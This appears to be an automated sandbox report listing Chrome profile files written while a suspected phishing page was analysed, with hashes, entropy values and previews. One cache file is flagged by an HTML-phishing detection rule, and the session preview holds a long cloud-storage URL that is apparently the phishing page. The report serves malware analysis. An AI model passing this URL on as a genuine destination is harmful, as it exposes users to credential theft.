                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\6db2d3e2-b12d-4753-a36a-3904db282014.tmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5869
                                                                                                                                                                                Entropy (8bit):5.195307938892697
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:nY8Cl3e995q8ct8cKILok0JCKL8QkA1UbOTQVuwn:njC095B28ck4KrkAE
                                                                                                                                                                                MD5:C0098EAF7CFDCB8CD45A3F1386EFA362
                                                                                                                                                                                SHA1:0406B45E85DEA86FDE0307D8E430F6D62148ED07
                                                                                                                                                                                SHA-256:D4E97EF666C59BC3B6792E6ECD74FA932A7F6EFE013EB11E46EF37BDDCF80C1A
                                                                                                                                                                                SHA-512:383B2A3E1DB84807757045EF5EC4776FF366B70BCB8A7366BFD837E6B355A2BB9397A7041331EA26B98A597A03901EA01B8CE3933AD60A9EBDB75E0F8FB0C14C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13279684639611036","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\87f7696b-5039-4fdb-a102-3f34d3c97e7f.tmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:modified
                                                                                                                                                                                Size (bytes):2642
                                                                                                                                                                                Entropy (8bit):4.931732465818912
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:Y2TntwXGDH3qz5sAGs2RLsBCrq9sMRscO7sk5saMHkYdseMHIMHKUDYhbD:JTnOXGDHaz/IJr4nO1pGVGIGKjhH
                                                                                                                                                                                MD5:4D2806DA3AA743750E56DA11560ADE1F
                                                                                                                                                                                SHA1:D0CEC495EF3EE8981234CF43EE94B42E441632E5
                                                                                                                                                                                SHA-256:485661F34B6AA865CC4CB4794F2ACAFF6072402172FE2C97E6399972D8B4D1EB
                                                                                                                                                                                SHA-512:F532BFDF6C660E4F4D4987AF8E1362BFD6A6D8D4C0717FBBB50621C890DDF8561096416DD4D8B732628A66F34D25B96A95B58862D36B98276E05227BBE99AE4B
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://www.google.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expiration":"13282276641673104","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://redirector.gvt1.com"},{"alternative_service":[{"advertised_versions":[50],"expiration":"13282276641679333","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://accounts.google.com","supports_spdy":true},{"al
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):331
                                                                                                                                                                                Entropy (8bit):5.2733469164434545
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaI3+q2PWXp+N23iKKdK9RXXTZIFUtna8BlWZmwBaOVkwOWXp+N23iKKdK9RXXH:paE+va5Kk7XT2FUtna8B4/BaOV5f5KkT
                                                                                                                                                                                MD5:B9B43FA61D870E684E9DB9E17B4B8898
                                                                                                                                                                                SHA1:827B47F8D7CA5D873FDFF63B86D5863EAA4B8376
                                                                                                                                                                                SHA-256:195723367F9AD8E3F2DEFD61AF001A999EAF623C9C7B96A3E431863C4BF0CC1B
                                                                                                                                                                                SHA-512:6007E1FCF285511B3A188C3700A19749AEF2BF05627CCFA7F2E24866D04B61491FC22DF8CFD329E446B8143ABA0AB55177888F33D311A66FA6A040549D970E11
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:36.588 d0c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/MANIFEST-000001.2021/10/25-18:17:36.590 d0c Recovering log #3.2021/10/25-18:17:36.591 d0c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG.old (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):331
                                                                                                                                                                                Entropy (8bit):5.2733469164434545
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaI3+q2PWXp+N23iKKdK9RXXTZIFUtna8BlWZmwBaOVkwOWXp+N23iKKdK9RXXH:paE+va5Kk7XT2FUtna8B4/BaOV5f5KkT
                                                                                                                                                                                MD5:B9B43FA61D870E684E9DB9E17B4B8898
                                                                                                                                                                                SHA1:827B47F8D7CA5D873FDFF63B86D5863EAA4B8376
                                                                                                                                                                                SHA-256:195723367F9AD8E3F2DEFD61AF001A999EAF623C9C7B96A3E431863C4BF0CC1B
                                                                                                                                                                                SHA-512:6007E1FCF285511B3A188C3700A19749AEF2BF05627CCFA7F2E24866D04B61491FC22DF8CFD329E446B8143ABA0AB55177888F33D311A66FA6A040549D970E11
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:36.588 d0c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/MANIFEST-000001.2021/10/25-18:17:36.590 d0c Recovering log #3.2021/10/25-18:17:36.591 d0c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):315
                                                                                                                                                                                Entropy (8bit):5.241725355263398
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaHi+q2PWXp+N23iKKdKyDZIFUtnaSWZmwBaLIVkwOWXp+N23iKKdKyJLJ:paHi+va5Kk02FUtnat/BaLIV5f5KkWJ
                                                                                                                                                                                MD5:A67C1E832B1401B76606F4FC1616ABAF
                                                                                                                                                                                SHA1:DBE0EA47A3FA671E90951FEEA03670039F31FE81
                                                                                                                                                                                SHA-256:7E4CC92D22ED59283374C21711ECE51FB320486F1C045DB82FBBBDAB92ADF4EB
                                                                                                                                                                                SHA-512:71FBE020E0A7C2439E6C196B326008C119F28A977CE191B4454D7122F77D8C47F2F6FFC37846B2AA531B724A33C2DDED7EC2ADDC5AA4BD85825D2D6D613D4CE1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:36.568 d0c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/MANIFEST-000001.2021/10/25-18:17:36.570 d0c Recovering log #3.2021/10/25-18:17:36.571 d0c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG.old (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):315
                                                                                                                                                                                Entropy (8bit):5.241725355263398
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maaHi+q2PWXp+N23iKKdKyDZIFUtnaSWZmwBaLIVkwOWXp+N23iKKdKyJLJ:paHi+va5Kk02FUtnat/BaLIV5f5KkWJ
                                                                                                                                                                                MD5:A67C1E832B1401B76606F4FC1616ABAF
                                                                                                                                                                                SHA1:DBE0EA47A3FA671E90951FEEA03670039F31FE81
                                                                                                                                                                                SHA-256:7E4CC92D22ED59283374C21711ECE51FB320486F1C045DB82FBBBDAB92ADF4EB
                                                                                                                                                                                SHA-512:71FBE020E0A7C2439E6C196B326008C119F28A977CE191B4454D7122F77D8C47F2F6FFC37846B2AA531B724A33C2DDED7EC2ADDC5AA4BD85825D2D6D613D4CE1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:36.568 d0c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/MANIFEST-000001.2021/10/25-18:17:36.570 d0c Recovering log #3.2021/10/25-18:17:36.571 d0c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):45056
                                                                                                                                                                                Entropy (8bit):0.12565886213280678
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:dheROvN0hNlIb5Rbvadf6E5nt6uIoasWcWY59pPuZPL:doouiPvadf6Ot6uWcD5fmZj
                                                                                                                                                                                MD5:FFA1E10F04873F893A17646C25246C9A
                                                                                                                                                                                SHA1:4953F75A049713C79FC30EEE0F8AD5186FBE22DD
                                                                                                                                                                                SHA-256:1566D548AF61174CD7B1746EB57B16F56005D168726FD646AEAFC51454BEA8A1
                                                                                                                                                                                SHA-512:019F81798A24BDBC83E9349CA6EAE6F6D1C67BCCB58AFB0652BA1B0232E86BD7050F500F94BA55933A06F74CC2731DD66A74E59F3A20A6B9C6383DE0AE65C4EE
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: ............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                Entropy (8bit):0.09579449792861866
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:WhwoqneL+Q9sSpH7m4VjF/OUmUd9I2kCt00OM+BXYNU9S7YlqE0:WhLgef++bPBFcTv50xWYOci
                                                                                                                                                                                MD5:9F669843B39959F05100EBC37251949E
                                                                                                                                                                                SHA1:BC5D25FD11301E3EE0E4C02F6FEFDC33E283E300
                                                                                                                                                                                SHA-256:DABA8957ABCA115EDB60C64B08BA3B2DC262F555490FD11F7F1F7E9420843649
                                                                                                                                                                                SHA-512:0D084FDA8A086F1E12E80F02815CF3C61910704DFC5FC88CCBE1941BCD9888EB9B3D1D07E13CA4027DEB4E21AEC740797B83C509CB316BB0D4AC1221EA8FBBA9
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: ..................................................................................=.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1056768
                                                                                                                                                                                Entropy (8bit):0.40305112497688445
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:1mxDGoJtj6Jt9D/hP9JtKmJtEYTRh3NJtZDahP9JteXJt:AG0kQPQ
                                                                                                                                                                                MD5:5521287082BE712F5B08DD7978584156
                                                                                                                                                                                SHA1:1B8E0928ACF52CFFC31995805EE579A7F5F39A98
                                                                                                                                                                                SHA-256:419B88582E640A2F9D80C3F00FC684F7092DCCF5F778E2A9875E94BE28FED384
                                                                                                                                                                                SHA-512:E30CD8FBCD3C07CB13F12F0D1D54A8FACC821E21150B4F5C32D8E12895A27D0934A52345407EEA2FFBBED3B936AE3677F1BC9A2A1E7B1BD3D4320E411E751EC3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):4202496
                                                                                                                                                                                Entropy (8bit):0.21567917319572757
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:dS/1pMJt2vsYoftJtdWIWo4HXJttAXJt5RC5AvEZZ81Q5l82ceJtRP/HxJtH/4wq:uhvsYsWVpH+Kf8171wwvsYR
                                                                                                                                                                                MD5:FCDADE54C34DD7B05E4526072EEA32BF
                                                                                                                                                                                SHA1:E2A500145EBFD5951FC2311135E5A3783140C382
                                                                                                                                                                                SHA-256:81C0A30DACBBFC019178A49690011C4ECD606966702E1024F4DB2269644935C7
                                                                                                                                                                                SHA-512:6B631F64AD66B4E27FBA61CF6953681EB48507B50EF06257B975764A865A44D246384547468710F5E381DF89A61BACE8BB33F514A0EA497ECF1F75360AFAACC3
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: JoeSecurity_HtmlPhish_10, Description: Yara detected HtmlPhish_10, Source: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3, Author: Joe Security
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: ..................................................................................?.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                Entropy (8bit):0.5154898084991041
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:TLyqJLbXaFpEO5bNmISHn06UwcQPx5fB:TekLLOpEO5J/Kn7U1uB
                                                                                                                                                                                MD5:861034A57F72A428F833D9A8C57FDB6C
                                                                                                                                                                                SHA1:FE4DE8A11179326A9123EE17DE6A7D05B1068EBB
                                                                                                                                                                                SHA-256:CD7D1643DE768BAC3214CDBCF0F5FB08C0FA9F4D81E3EF431CF98569E4165494
                                                                                                                                                                                SHA-512:036613279BCD2D8C54EA21C80BA93DCC4D3D23E835D2FD390690011F2679DADEDE3DECAA219D1749348DB859B6D211E325E5483740984BFBBA2A590E8BCA962C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Session
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):6313
                                                                                                                                                                                Entropy (8bit):4.999154893070947
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:34eZFM0cPSTsAEBSVodzN8ldMJ9b0pZFGPCbN6d5oFM0cPSTsAEP7l:3hQPSTsAqRIaqG6u5PSTsAe
                                                                                                                                                                                MD5:B5F78D95B1CF77B42243CDA30AC977FB
                                                                                                                                                                                SHA1:0C75EDCE4E41389CE57A78291658F302C18DED19
                                                                                                                                                                                SHA-256:416A718815E11F9998B88607C5BE97CE5D817498824EC676E7AD55AB51011015
                                                                                                                                                                                SHA-512:0C7E1246BF7A87C2746682DDCE6FA8E214C0DFDB68DD69E4D1AAB620C92A24BD8E762E2A8971FE3F24F9FC6C9E13185B914D648767F56432BE4F591A588844F1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: SNSS....................................................!.............................................1..,.......$...1e1f6d57_8306_4ff5_9329_811f940ced6b..........................................................................................................5..0.......&...{AE32626E-B2F7-4664-89C4-2B2C2DB60905}.............%.. ...............https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/download/storage/v1/b/logon_id63757945b-32c6-49b0-83e6-1d93765276e7/o/index.html?jk=AFshE3VcvfzNdf-7zMKWd94-4dMrNIkOLLE47CQ43PY7P2MYpfKpiTisbCiM8ITDVUzsV5uBnwUTgNfImCvdn95XFg7yLPb4pK7mGtnykL6H73onzrS0TNqkpgxfmCGl9SjrMUh2HXQovXq0n_fa5hqbVlcfrBGOpBCkBBOuoY-yrNdFJA6qsh5mXJeZJEWhpyesRFni67jgONcRuOW0IhE2TSFjfiZ1kcHtUg4IakFROfuF2ixmgmZ0cygvwFJgzltWAi4BZy9gK7vN7kuIcB7IqaENeixO24771GkuNYSmkiDTJACa0r0VCNPcQlcK5lGRRAu7CmqBicTQElQR1sT8UAlS8qEccylxwvHxtG1ZQipoKLv7jRTmXa5gKf9qryarS-JmN2Dw-wvzqjvQU3ACMffC05IslAl45AuBr7XJD_AvOH4XV0oB1K69D_BJqrPx5F866tHjL87vL2OzmhOn2ZN6fGK9EaMH6l71egH
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Tabs
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):8
                                                                                                                                                                                Entropy (8bit):1.8112781244591325
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:3Dtn:3h
                                                                                                                                                                                MD5:0686D6159557E1162D04C44240103333
                                                                                                                                                                                SHA1:053E9DB58E20A67D1E158E407094359BF61D0639
                                                                                                                                                                                SHA-256:3303D5EED881951B0BB52CF1C6BFA758770034D0120C197F9F7A3520B92A86FB
                                                                                                                                                                                SHA-512:884C0D3594390E2FC0AEAB05460F0783815170C4B57DB749B8AD9CD10741A5604B7A0F979465C4171AD9C14ED56359A4508B4DE58E794550599AAA261120976C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: SNSS....
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):335
                                                                                                                                                                                Entropy (8bit):3.5297306448944714
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCT5z/t2qoEwhXeLKB:qWWWWWWWWWbopXeLKB
                                                                                                                                                                                MD5:4B02663C177BA8EA36FB2E49617CCC05
                                                                                                                                                                                SHA1:6E77145135116873842B1BEE6622B116CDA3CBB1
                                                                                                                                                                                SHA-256:0FD0B4ED1B18A8A1C73736E3C74168C6102092E5AFD431CD36F7F222E578A1C9
                                                                                                                                                                                SHA-512:6FAE4934BB9F78B40ECE19DC10FD522EB88497B97F47B76AC4DBC28146F73D23984322AFBF32DDBC3AC219277A7A6F899FAE59E5834DC2E28377A6306D9D6F03
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................i.Wd...............Sgdaefkejpgkiemlaofpalmlakkmbjdnl.declarative_rules.declarativeContent.onPageChanged.[]..F..................F................
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):317
                                                                                                                                                                                Entropy (8bit):5.267593307611914
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maawcSQWM+q2PWXp+N23iKKdK8aPrqIFUtnaiOAG1ZmwBaTpQWMVkwOWXp+N23if:pawc3+va5KkL3FUtnal1/BaTiV5f5Kkc
                                                                                                                                                                                MD5:282EEE31318BFBD9CE7B2931DE306F92
                                                                                                                                                                                SHA1:14B0A6DA34DBD8F01D578E5552599CA4B52EC518
                                                                                                                                                                                SHA-256:7E5B5581DA37934FBF72E2035CD458360000A9ED3DD1C28F4BED0A6620B5CD20
                                                                                                                                                                                SHA-512:4D255D9DBA1CEE12C247A01E34FEC128A9F3A2D3F309DD14DCB9BE0B597D07579CF8CE5B965AF669773E5B52998034BE6ED2FC79F7403DAB3868C54EAB4AF927
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:19.652 91c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/MANIFEST-000001.2021/10/25-18:17:19.654 91c Recovering log #3.2021/10/25-18:17:19.655 91c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG.old (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):317
                                                                                                                                                                                Entropy (8bit):5.267593307611914
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maawcSQWM+q2PWXp+N23iKKdK8aPrqIFUtnaiOAG1ZmwBaTpQWMVkwOWXp+N23if:pawc3+va5KkL3FUtnal1/BaTiV5f5Kkc
                                                                                                                                                                                MD5:282EEE31318BFBD9CE7B2931DE306F92
                                                                                                                                                                                SHA1:14B0A6DA34DBD8F01D578E5552599CA4B52EC518
                                                                                                                                                                                SHA-256:7E5B5581DA37934FBF72E2035CD458360000A9ED3DD1C28F4BED0A6620B5CD20
                                                                                                                                                                                SHA-512:4D255D9DBA1CEE12C247A01E34FEC128A9F3A2D3F309DD14DCB9BE0B597D07579CF8CE5B965AF669773E5B52998034BE6ED2FC79F7403DAB3868C54EAB4AF927
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:19.652 91c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/MANIFEST-000001.2021/10/25-18:17:19.654 91c Recovering log #3.2021/10/25-18:17:19.655 91c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1482
                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW8:
                                                                                                                                                                                MD5:531557DF3F473422DD0102A22E51FE15
                                                                                                                                                                                SHA1:E2048D9AD1D7E3AC2135A339A6FF91814A473501
                                                                                                                                                                                SHA-256:FB89F5D2BDE68159700BDE0E306D9E5D5CFF0B0AF733603967D228BB9C286A93
                                                                                                                                                                                SHA-512:64EFCB0E9EA0D90E827555B9CA381A34F39AADD524B631CD5E3D4BA1EEF0A27CDEE8116138869A7FD5BE0F647CEEA08F95146273138921C46F1245DA0D0A9C4A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):317
                                                                                                                                                                                Entropy (8bit):5.224368472682798
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maa+2SwQWM+q2PWXp+N23iKKdK8NIFUtna+tG1ZmwBa+N6QWMVkwOWXp+N23iKKb:pa4N+va5KkpFUtnah1/Ba8/V5f5KkqJ
                                                                                                                                                                                MD5:C9091A9BA20C2A5A4F74A69802649B87
                                                                                                                                                                                SHA1:A6F1F60C5AA6CF5F86C4484B19C3ECE1E53A7D22
                                                                                                                                                                                SHA-256:904DF0292AFFEF9811207FE12E6DDD19A0BA8D4B01359CCBF4BDD232D49C46EC
                                                                                                                                                                                SHA-512:E19FD5BD31AC0154A0394283238C73D7D5D40D5AA04735BCA002018AC467F86D51733E0B7B95C5E770F43DC5A06A7959F7ACF43AFCF0A9EA75632A8B7E28A959
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 2021/10/25-18:17:21.421 91c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/MANIFEST-000001.2021/10/25-18:17:21.422 91c Recovering log #3.2021/10/25-18:17:21.447 91c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):317
                                                                                                                                                                                Entropy (8bit):5.224368472682798
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:maa+2SwQWM+q2PWXp+N23iKKdK8NIFUtna+tG1ZmwBa+N6QWMVkwOWXp+N23iKKb:pa4N+va5KkpFUtnah1/Ba8/V5f5KkqJ
                                                                                                                                                                                MD5:C9091A9BA20C2A5A4F74A69802649B87
                                                                                                                                                                                SHA1:A6F1F60C5AA6CF5F86C4484B19C3ECE1E53A7D22
                                                                                                                                                                                SHA-256:904DF0292AFFEF9811207FE12E6DDD19A0BA8D4B01359CCBF4BDD232D49C46EC
                                                                                                                                                                                SHA-512:E19FD5BD31AC0154A0394283238C73D7D5D40D5AA04735BCA002018AC467F86D51733E0B7B95C5E770F43DC5A06A7959F7ACF43AFCF0A9EA75632A8B7E28A959
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
